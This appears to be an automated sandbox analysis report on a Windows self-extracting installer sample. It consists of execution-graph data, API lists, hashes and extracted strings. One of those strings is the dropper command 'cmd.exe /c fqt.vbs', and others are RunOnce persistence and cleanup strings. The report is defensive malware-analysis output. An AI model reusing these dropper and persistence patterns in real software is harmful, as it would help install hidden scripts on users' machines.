2892 7ff7d6fd7700 GetLastError 2622->2892 2626 7ff7d6fd4dcc 24 API calls 2624->2626 2627 7ff7d6fd404e 2625->2627 2628 7ff7d6fd4098 LocalFree 2625->2628 2630 7ff7d6fd4011 LocalFree 2626->2630 2631 7ff7d6fd7ac8 28 API calls 2627->2631 2629 7ff7d6fd3139 2628->2629 2629->2161 2629->2202 2630->2629 2632 7ff7d6fd406e LocalFree 2631->2632 2632->2629 2633->2195 2641 7ff7d6fd778a 2634->2641 2635 7ff7d6fd114c _vsnprintf 2636 7ff7d6fd77df FindResourceA 2635->2636 2637 7ff7d6fd7801 2636->2637 2638 7ff7d6fd775e LoadResource LockResource 2636->2638 2639 7ff7d6fd8470 7 API calls 2637->2639 2638->2637 2638->2641 2640 7ff7d6fd782e 2639->2640 2640->2204 2641->2635 2642 7ff7d6fd7803 FreeResource 2641->2642 2643 7ff7d6fd77b8 FreeResource 2641->2643 2642->2637 2643->2641 2645 7ff7d6fd5050 7 API calls 2644->2645 2646 7ff7d6fd4967 LocalAlloc 2645->2646 2647 7ff7d6fd49a9 2646->2647 2648 7ff7d6fd4989 2646->2648 2650 7ff7d6fd5050 7 API calls 2647->2650 2649 7ff7d6fd4dcc 24 API calls 2648->2649 2651 7ff7d6fd49a7 2649->2651 2652 7ff7d6fd49bb 2650->2652 2651->2202 2653 7ff7d6fd49d5 lstrcmpA 2652->2653 2655 7ff7d6fd49bf 2652->2655 2654 7ff7d6fd4a0e LocalFree 2653->2654 2653->2655 2654->2651 2656 7ff7d6fd4dcc 24 API calls 2655->2656 2656->2654 2657->2455 2659 7ff7d6fd6516 2658->2659 2662 7ff7d6fd65dd 2658->2662 2689 7ff7d6fd63b8 2659->2689 2661 7ff7d6fd6688 2665 7ff7d6fd8470 7 API calls 2661->2665 2700 7ff7d6fd6b70 2662->2700 2669 7ff7d6fd66a8 2665->2669 2667 7ff7d6fd65cc 2672 7ff7d6fd7ba8 CharPrevA 2667->2672 2668 7ff7d6fd6577 GetSystemInfo 2680 7ff7d6fd6591 2668->2680 2669->2486 2683 7ff7d6fd2468 GetWindowsDirectoryA 2669->2683 2670 7ff7d6fd6649 2670->2661 2675 7ff7d6fd6ca4 38 API calls 2670->2675 2671 7ff7d6fd662a CreateDirectoryA 2673 7ff7d6fd663f 2671->2673 2674 7ff7d6fd667d 2671->2674 2672->2662 2673->2670 2712 7ff7d6fd7700 GetLastError 2674->2712 2678 7ff7d6fd665a 2675->2678 2677 7ff7d6fd7ba8 CharPrevA 2677->2667 2678->2661 2681 7ff7d6fd6666 RemoveDirectoryA 2678->2681 2679 7ff7d6fd6682 
2679->2661 2680->2667 2680->2677 2681->2661 2682->2485 2684 7ff7d6fd24c4 2683->2684 2685 7ff7d6fd24a6 2683->2685 2687 7ff7d6fd8470 7 API calls 2684->2687 2686 7ff7d6fd4dcc 24 API calls 2685->2686 2686->2684 2688 7ff7d6fd24df 2687->2688 2688->2499 2688->2507 2691 7ff7d6fd63e3 2689->2691 2692 7ff7d6fd7ba8 CharPrevA 2691->2692 2695 7ff7d6fd644b GetTempFileNameA 2691->2695 2713 7ff7d6fd114c 2691->2713 2693 7ff7d6fd6420 RemoveDirectoryA GetFileAttributesA 2692->2693 2693->2691 2694 7ff7d6fd64b6 CreateDirectoryA 2693->2694 2694->2695 2696 7ff7d6fd6490 2694->2696 2695->2696 2697 7ff7d6fd646b DeleteFileA CreateDirectoryA 2695->2697 2698 7ff7d6fd8470 7 API calls 2696->2698 2697->2696 2699 7ff7d6fd64a2 2698->2699 2699->2661 2699->2667 2699->2668 2701 7ff7d6fd6b8b 2700->2701 2701->2701 2702 7ff7d6fd6b94 LocalAlloc 2701->2702 2703 7ff7d6fd6bb4 2702->2703 2705 7ff7d6fd6bf5 2702->2705 2704 7ff7d6fd4dcc 24 API calls 2703->2704 2711 7ff7d6fd6bd2 2704->2711 2707 7ff7d6fd7ba8 CharPrevA 2705->2707 2709 7ff7d6fd6c14 CreateFileA LocalFree 2707->2709 2708 7ff7d6fd6626 2708->2670 2708->2671 2710 7ff7d6fd6c61 CloseHandle GetFileAttributesA 2709->2710 2709->2711 2710->2711 2711->2708 2716 7ff7d6fd7700 GetLastError 2711->2716 2712->2679 2714 7ff7d6fd1178 _vsnprintf 2713->2714 2715 7ff7d6fd1199 2713->2715 2714->2715 2715->2691 2716->2708 2717->2532 2718->2537 2720 7ff7d6fd2525 2719->2720 2721 7ff7d6fd2562 2719->2721 2722 7ff7d6fd114c _vsnprintf 2720->2722 2723 7ff7d6fd2567 2721->2723 2724 7ff7d6fd25ab 2721->2724 2726 7ff7d6fd253d 2722->2726 2727 7ff7d6fd114c _vsnprintf 2723->2727 2725 7ff7d6fd255d 2724->2725 2728 7ff7d6fd114c _vsnprintf 2724->2728 2729 7ff7d6fd8470 7 API calls 2725->2729 2730 7ff7d6fd4dcc 24 API calls 2726->2730 2731 7ff7d6fd257f 2727->2731 2732 7ff7d6fd25c7 2728->2732 2733 7ff7d6fd2609 2729->2733 2730->2725 2734 7ff7d6fd4dcc 24 API calls 2731->2734 2735 7ff7d6fd4dcc 24 API calls 2732->2735 2733->2535 2734->2725 2735->2725 2736->2529 2738 7ff7d6fd5ced 2737->2738 2739 
7ff7d6fd5d62 2737->2739 2749 7ff7d6fd5380 2738->2749 2741 7ff7d6fd8470 7 API calls 2739->2741 2743 7ff7d6fd5d78 2741->2743 2743->2554 2743->2556 2744 7ff7d6fd5d0d #21 2744->2739 2745 7ff7d6fd5d28 2744->2745 2745->2739 2761 7ff7d6fd5770 2745->2761 2748 7ff7d6fd5d4f #23 2748->2739 2750 7ff7d6fd53b3 2749->2750 2751 7ff7d6fd53d0 2750->2751 2752 7ff7d6fd53fd lstrcmpA 2750->2752 2754 7ff7d6fd4dcc 24 API calls 2751->2754 2753 7ff7d6fd53f4 2752->2753 2755 7ff7d6fd5454 2752->2755 2753->2739 2753->2744 2754->2753 2755->2753 2756 7ff7d6fd54a8 CreateFileA 2755->2756 2756->2753 2758 7ff7d6fd54de 2756->2758 2757 7ff7d6fd5561 CreateFileA 2757->2753 2758->2753 2758->2757 2759 7ff7d6fd5549 CharNextA 2758->2759 2760 7ff7d6fd5532 CreateDirectoryA 2758->2760 2759->2758 2760->2759 2762 7ff7d6fd57a4 CloseHandle 2761->2762 2763 7ff7d6fd578f 2761->2763 2762->2763 2763->2739 2763->2748 2765 7ff7d6fd16d3 2764->2765 2856 7ff7d6fd15e8 2765->2856 2768 7ff7d6fd7ba8 CharPrevA 2770 7ff7d6fd1766 2768->2770 2769 7ff7d6fd7d68 2 API calls 2771 7ff7d6fd1811 2769->2771 2770->2769 2772 7ff7d6fd1a1b 2771->2772 2773 7ff7d6fd181a CompareStringA 2771->2773 2774 7ff7d6fd7d68 2 API calls 2772->2774 2773->2772 2775 7ff7d6fd184d GetFileAttributesA 2773->2775 2776 7ff7d6fd1a28 2774->2776 2777 7ff7d6fd19f3 2775->2777 2778 7ff7d6fd1867 2775->2778 2779 7ff7d6fd1a31 CompareStringA 2776->2779 2780 7ff7d6fd1acb LocalAlloc 2776->2780 2782 7ff7d6fd4dcc 24 API calls 2777->2782 2778->2777 2781 7ff7d6fd15e8 2 API calls 2778->2781 2779->2780 2790 7ff7d6fd1a60 2779->2790 2780->2777 2783 7ff7d6fd1aeb GetFileAttributesA 2780->2783 2784 7ff7d6fd188b 2781->2784 2800 7ff7d6fd194f 2782->2800 2795 7ff7d6fd1b01 2783->2795 2785 7ff7d6fd18b5 LocalAlloc 2784->2785 2787 7ff7d6fd15e8 2 API calls 2784->2787 2785->2777 2788 7ff7d6fd18d7 GetPrivateProfileIntA GetPrivateProfileStringA 2785->2788 2786 7ff7d6fd1bd1 2789 7ff7d6fd8470 7 API calls 2786->2789 2787->2785 2791 7ff7d6fd1984 2788->2791 2788->2800 2792 7ff7d6fd1be9 2789->2792 
2790->2790 2793 7ff7d6fd1a81 LocalAlloc 2790->2793 2796 7ff7d6fd1995 GetShortPathNameA 2791->2796 2797 7ff7d6fd19ba 2791->2797 2792->2597 2793->2777 2798 7ff7d6fd1ab2 2793->2798 2802 7ff7d6fd1b54 2795->2802 2796->2797 2801 7ff7d6fd114c _vsnprintf 2797->2801 2799 7ff7d6fd114c _vsnprintf 2798->2799 2799->2800 2800->2786 2801->2800 2864 7ff7d6fd2a6c 2802->2864 2804 7ff7d6fd1dce 2803->2804 2805 7ff7d6fd2019 2803->2805 2808 7ff7d6fd114c _vsnprintf 2804->2808 2810 7ff7d6fd1e25 2804->2810 2806 7ff7d6fd8470 7 API calls 2805->2806 2807 7ff7d6fd2028 2806->2807 2807->2597 2809 7ff7d6fd1dee RegQueryValueExA 2808->2809 2809->2804 2809->2810 2811 7ff7d6fd1e46 GetSystemDirectoryA 2810->2811 2812 7ff7d6fd1e29 RegCloseKey 2810->2812 2813 7ff7d6fd7ba8 CharPrevA 2811->2813 2812->2805 2814 7ff7d6fd1e6a LoadLibraryA 2813->2814 2815 7ff7d6fd1f55 GetModuleFileNameA 2814->2815 2816 7ff7d6fd1e86 GetProcAddress FreeLibrary 2814->2816 2817 7ff7d6fd1f78 RegCloseKey 2815->2817 2821 7ff7d6fd1ee8 2815->2821 2816->2815 2818 7ff7d6fd1ebe GetSystemDirectoryA 2816->2818 2817->2805 2819 7ff7d6fd1ed5 2818->2819 2818->2821 2820 7ff7d6fd7ba8 CharPrevA 2819->2820 2820->2821 2821->2821 2822 7ff7d6fd1f11 LocalAlloc 2821->2822 2823 7ff7d6fd1f35 2822->2823 2824 7ff7d6fd1f8e 2822->2824 2826 7ff7d6fd4dcc 24 API calls 2823->2826 2825 7ff7d6fd114c _vsnprintf 2824->2825 2827 7ff7d6fd1fc4 2825->2827 2828 7ff7d6fd1f53 2826->2828 2827->2827 2829 7ff7d6fd1fcd RegSetValueExA RegCloseKey LocalFree 2827->2829 2828->2817 2829->2805 2831 7ff7d6fd48b3 2830->2831 2832 7ff7d6fd47c2 WaitForSingleObject GetExitCodeProcess 2830->2832 2891 7ff7d6fd7700 GetLastError 2831->2891 2833 7ff7d6fd47f9 2832->2833 2839 7ff7d6fd2318 18 API calls 2833->2839 2844 7ff7d6fd482a CloseHandle CloseHandle 2833->2844 2835 7ff7d6fd48b8 GetLastError FormatMessageA 2836 7ff7d6fd4dcc 24 API calls 2835->2836 2838 7ff7d6fd491c 2836->2838 2841 7ff7d6fd8470 7 API calls 2838->2841 2843 7ff7d6fd484d 2839->2843 2840 7ff7d6fd48aa 2840->2838 2842 7ff7d6fd492f 
                                                                      [Execution graph, continued; graph node and edge export not reproduced. Basic blocks in this part call CharPrevA, GetFileAttributesA, LoadLibraryA, LoadLibraryExA, GetModuleFileNameA, IsDBCSLeadByte, CharNextA, CharUpperA, WritePrivateProfileStringA, _lopen, _llseek, _lclose, GetDesktopWindow, EndDialog, SetWindowTextA, SetDlgItemTextA, SetForegroundWindow, LoadStringA, MessageBeep, ?terminate@, SetUnhandledExceptionFilter, ResetEvent, TerminateThread, CreateThread, GetDlgItem, SendMessageA, SetEvent, SetWindowPos, MsgWaitForMultipleObjects, PeekMessageA, DispatchMessageA, WriteFile, SendDlgItemMessageA, GetModuleHandleW, __set_app_type, __setusermatherr.]

                                                                      Callgraph
                                                                      [Interactive call graph of the module's functions (nodes Function_00007FF7D6FD1008 ... Function_00007FF7D6FD8B60 with call edges); graph export data not reproduced. Entry chain shown in the graph: Function_00007FF7D6FD80D0 -> Function_00007FF7D6FD8818, Function_00007FF7D6FD8870; Function_00007FF7D6FD8200 -> Function_00007FF7D6FD2C54, Function_00007FF7D6FD88D0, Function_00007FF7D6FD8964.]

                                                                      Control-flow Graph
                                                                      [Function 7ff7d6fd40c4; graph export data not reproduced. Basic blocks call memset, CompareStringA, RegOpenKeyExA, RegQueryValueExA, GetSystemDirectoryA, RegSetValueExA, RegCloseKey, GetProcAddress, FreeLibrary, LocalFree, and internal functions 7ff7d6fd5050, 7ff7d6fd4dcc, 7ff7d6fd1684, 7ff7d6fd473c, 7ff7d6fd1d28, 7ff7d6fd79f0, 7ff7d6fd114c, 7ff7d6fd7ba8, 7ff7d6fd7700, 7ff7d6fd8470.]
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$Free$CompareFindLibraryLocalString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                      • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$Software\Microsoft\Windows\CurrentVersion\RunOnce$USRQCMD$advpack.dll$cmd.exe /c fqt.vbs$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
                                                                      • API String ID: 2679723528-2313663239
                                                                      • Opcode ID: 47eb29a787de270268fb154fbc2d409703058abd89df6d54f7005b929927f1b1
                                                                      • Instruction ID: af7a76db2bb563758da45a8609b7e621cbfc1dc4360985fcfff809657c7f6626
                                                                      • Opcode Fuzzy Hash: 47eb29a787de270268fb154fbc2d409703058abd89df6d54f7005b929927f1b1
                                                                      • Instruction Fuzzy Hash: 18024B71E08A4A86E720AB54AC402BFB7A4FB95748FD85136DB4D42694DF3CF54ACF20

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                      • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
                                                                      • API String ID: 178549006-3726664654
                                                                      • Opcode ID: 276e9805d9b7e1d57039d94b06db834f3dbf8df68e4bbb97ed4dd8757e439085
                                                                      • Instruction ID: bda8d37c5b11c3f6f983cffb632f1850e8e3937f7c25a4e8591e350cf5929039
                                                                      • Opcode Fuzzy Hash: 276e9805d9b7e1d57039d94b06db834f3dbf8df68e4bbb97ed4dd8757e439085
                                                                      • Instruction Fuzzy Hash: 97813A32E08E4A96E710AB51EC542BEB7A5FB99B54FC85132DA4E43794DF3CE106CB10

                                                                      Control-flow Graph
                                                                      [Function 7ff7d6fd1684; graph export data not reproduced. Basic blocks call CompareStringA, GetFileAttributesA, LocalAlloc, GetPrivateProfileIntA, GetPrivateProfileStringA, GetShortPathNameA, and internal functions 7ff7d6fd15e8, 7ff7d6fd7ba8, 7ff7d6fd7d68, 7ff7d6fd4dcc, 7ff7d6fd1008, 7ff7d6fd2a6c, 7ff7d6fd114c, 7ff7d6fd1084, 7ff7d6fd8470.]
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                      • String ID: .BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                      • API String ID: 383838535-3544074861
                                                                      • Opcode ID: 137c5f28b5b86e8721d426d5fc1592b78fb4194462560af86aa0c2ab9f656457
                                                                      • Instruction ID: f525d3351960948ffc88f995b23e4318374b51521e19862885d8ec6e6350829d
                                                                      • Opcode Fuzzy Hash: 137c5f28b5b86e8721d426d5fc1592b78fb4194462560af86aa0c2ab9f656457
                                                                      • Instruction Fuzzy Hash: F7E17C62E08A8A95EB11EF50E8402BFA7A1EB55784FD84137DB4D03795DF3DE50ACB20

                                                                      Control-flow Graph
                                                                      [Function 7ff7d6fd66c4; graph export data not reproduced. Basic blocks call LocalAlloc, LocalFree, lstrcmpA, GetTempPathA, GetWindowsDirectoryA, GetDriveTypeA, GetFileAttributesA, GetDiskFreeSpaceA, MulDiv, CreateDirectoryA, SetFileAttributesA, and internal functions 7ff7d6fd5050, 7ff7d6fd4dcc, 7ff7d6fd7700, 7ff7d6fd7ac8, 7ff7d6fd64e4, 7ff7d6fd2468, 7ff7d6fd6ca4, 7ff7d6fd7ba8, 7ff7d6fd8470.]
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$Free$AttributesDirectoryFileFindLoadLocal$Windows$AllocCreateDialogDiskDriveErrorIndirectLastLockMessageParamPathSizeofSpaceStringTempTypelstrcmpmemcpy_s
                                                                      • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                      • API String ID: 3973824516-2740620654
                                                                      • Opcode ID: 10e5a1de4704b11e57effca18463699361e379a5f0e914d5799a333e44746406
                                                                      • Instruction ID: e7a212ec481ba9bcefafd3b7226d20ed5cd92ad8ea7c9aff3a4ba696501201bd
                                                                      • Opcode Fuzzy Hash: 10e5a1de4704b11e57effca18463699361e379a5f0e914d5799a333e44746406
                                                                      • Instruction Fuzzy Hash: 00D13122E58A4A86EB10AB1098502BFF7A1FB96744FD85136DB4D43695DF3DF406CF20

                                                                      Control-flow Graph
                                                                      [Function 7ff7d6fd2db4; graph export data not reproduced. Basic blocks call memset, CreateEventA, SetEvent, CreateMutexA, GetLastError, FindResourceExA, LoadResource, ordinal #17, CloseHandle, and internal functions 7ff7d6fd8b09, 7ff7d6fd5050, 7ff7d6fd4dcc, 7ff7d6fd70a8, 7ff7d6fd204c, 7ff7d6fd3bf4, 7ff7d6fd12ec, 7ff7d6fd7ac8, 7ff7d6fd8470.]
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$FindLoad$CreateEventmemset$CloseErrorFreeHandleLastLockMessageMutexSizeofStringVersionmemcpy_s
                                                                      • String ID: $EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$cmd.exe /c fqt.vbs
                                                                      • API String ID: 3100096412-2915214181
                                                                      • Opcode ID: 56b820130d1ad660dfa8e8d0e421b62bbaab1ba59714ea7f7ec2c9c3d28285f9
                                                                      • Instruction ID: b4531497e6df0bce19e9bea8480013bbef06522c6621189be7c3268a4a9fcd2b
                                                                      • Opcode Fuzzy Hash: 56b820130d1ad660dfa8e8d0e421b62bbaab1ba59714ea7f7ec2c9c3d28285f9
                                                                      • Instruction Fuzzy Hash: 39814822E08A4A86F720BB14AC043BFA691AB95789FCC5137DB4D42695CF7CB407CF20

                                                                      Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed)
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                      • API String ID: 4237285672-305352358
                                                                      • Opcode ID: 49cd0adaaefc1983ba8fc555e95bfd9e5a633419e36afff043da1f8bde31fc7d
                                                                      • Instruction ID: 54b4c91dc2ee85f51a2b939936c6e127da43138bc864b67ea6a2d11590ab0f82
                                                                      • Opcode Fuzzy Hash: 49cd0adaaefc1983ba8fc555e95bfd9e5a633419e36afff043da1f8bde31fc7d
                                                                      • Instruction Fuzzy Hash: 4CA14D36A18B4586E720AB60E8406AFFBA5FB89744FD84136DB4D43A54DF3CE44ACF10

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                      • String ID: *MEMCAB$CABINET
                                                                      • API String ID: 1305606123-2642027498
                                                                      • Opcode ID: 167cfbe3481d2c55deda2959b4f60fab9ca519b6d8b495f465010a09c29e0748
                                                                      • Instruction ID: a140040357018f0e08f6d761844246c889ae3c849dd12f4ec61bb085b4dda35d
                                                                      • Opcode Fuzzy Hash: 167cfbe3481d2c55deda2959b4f60fab9ca519b6d8b495f465010a09c29e0748
                                                                      • Instruction Fuzzy Hash: 6E51D731E08F4A86EB10AB50AC5477EEBA5FB89745FC88236DA4D46654DF7CF0068F20

                                                                      Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed)
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: DirectoryLibrary$AddressAllocDecryptFileFreeLoadLocalProcSystemWindows
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
                                                                      • API String ID: 3010855178-1173327654
                                                                      • Opcode ID: 1b568c9d80e1c16c25a8832b7560ad1fe553b1887f492639f14b46a0c907384f
                                                                      • Instruction ID: 3b8eebfc7cefb7c1b1ae2c6ead523f944048f63161d2fd87140be74e83225777
                                                                      • Opcode Fuzzy Hash: 1b568c9d80e1c16c25a8832b7560ad1fe553b1887f492639f14b46a0c907384f
                                                                      • Instruction Fuzzy Hash: 9A711922E4CE4B86FA60BB10AD412BFE695AF96745FD84037DB4D42295DF2CF4078E60

                                                                      Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed)
                                                                      APIs
                                                                      • GetSystemInfo.KERNEL32(?,?,?,?,?,?,0000000A,00007FF7D6FD2CE1), ref: 00007FF7D6FD657C
                                                                      • CreateDirectoryA.KERNEL32(?,?,?,?,?,?,0000000A,00007FF7D6FD2CE1), ref: 00007FF7D6FD662F
                                                                      • RemoveDirectoryA.KERNEL32(?,?,?,?,?,?,0000000A,00007FF7D6FD2CE1), ref: 00007FF7D6FD666F
                                                                        • Part of subcall function 00007FF7D6FD63B8: RemoveDirectoryA.KERNELBASE(0000000A,00007FF7D6FD2CE1), ref: 00007FF7D6FD6423
                                                                        • Part of subcall function 00007FF7D6FD63B8: GetFileAttributesA.KERNELBASE ref: 00007FF7D6FD6432
                                                                        • Part of subcall function 00007FF7D6FD63B8: GetTempFileNameA.KERNEL32 ref: 00007FF7D6FD645B
                                                                        • Part of subcall function 00007FF7D6FD63B8: DeleteFileA.KERNEL32 ref: 00007FF7D6FD6473
                                                                        • Part of subcall function 00007FF7D6FD63B8: CreateDirectoryA.KERNEL32 ref: 00007FF7D6FD6484
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
                                                                      • API String ID: 1979080616-3374052426
                                                                      • Opcode ID: 46ce37abadc5027e1bb67ef9580c9553c9e3bc3d3873299fa6b8c7dc3ad8012b
                                                                      • Instruction ID: f99afc226c4735fda272b17395f8ccee19cbb8ff442fd300bf92454231c88831
                                                                      • Opcode Fuzzy Hash: 46ce37abadc5027e1bb67ef9580c9553c9e3bc3d3873299fa6b8c7dc3ad8012b
